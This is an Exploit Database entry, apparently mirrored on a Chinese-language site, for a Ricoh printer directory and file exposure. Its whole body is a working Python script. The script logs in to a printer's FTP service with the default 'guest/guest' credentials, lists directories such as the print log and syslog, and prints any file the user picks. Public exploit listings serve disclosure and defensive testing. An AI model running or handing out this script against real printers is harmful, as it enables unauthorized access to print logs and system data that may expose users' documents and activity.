Ricoh Printer – Directory and File Exposure

• Exploit Database
• 20 阅读

• 作者： Thomas Heverin
  日期： 2024-01-29
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51755/

• #Exploit Title: Ricoh Printer Directory and File Exposure 
  #Date: 9/15/2023
  #Exploit Author: Thomas Heverin (Heverin Hacker)
  #Vendor Homepage: https://www.ricoh.com/products/printers-and-copiers
  #Software Link: https://replit.com/@HeverinHacker/Ricoh-Printer-Directory-and-File-Finder#main.py
  #Version: Ricoh Printers - All Versions
  #Tested on: Windows
  #CVE: N/A 
  
  #Directories Found: Help, Info (Printer Information), Prnlog (Print Log), Stat (Statistics) and Syslog (System Log)
  
  from ftplib import FTP
  
  def ftp_connect(ip):
  try:
  ftp = FTP(ip)
  ftp.login("guest", "guest")
  print(f"Connected to {ip} over FTP as 'guest'")
  return ftp
  except Exception as e:
  print(f"Failed to connect to {ip} over FTP: {e}")
  return None
  
  if __name__ == "__main__":
  target_ip = input("Enter the Ricoh Printer IP address: ")
  
  ftp_connection = ftp_connect(target_ip)
  if ftp_connection:
  try:
  while True:
  file_list = ftp_connection.nlst()
  print("List of Ricoh printer files and directories:")
  for index, item in enumerate(file_list, start=1):
  print(f"{index}. {item}")
  
  file_index = int(input("Enter the printer index of the file to read (1-based), or enter 0 to exit: ")) - 1
  if file_index < 0:
  break
  
  if 0 <= file_index < len(file_list):
  selected_file = file_list[file_index]
  lines = []
  ftp_connection.retrlines("RETR " + selected_file, lines.append)
  print(f"Contents of '{selected_file}':")
  for line in lines:
  print(line)
  else:
  print("Invalid file index.")
  except Exception as e:
  print(f"Failed to perform operation: {e}")
  finally:
  ftp_connection.quit()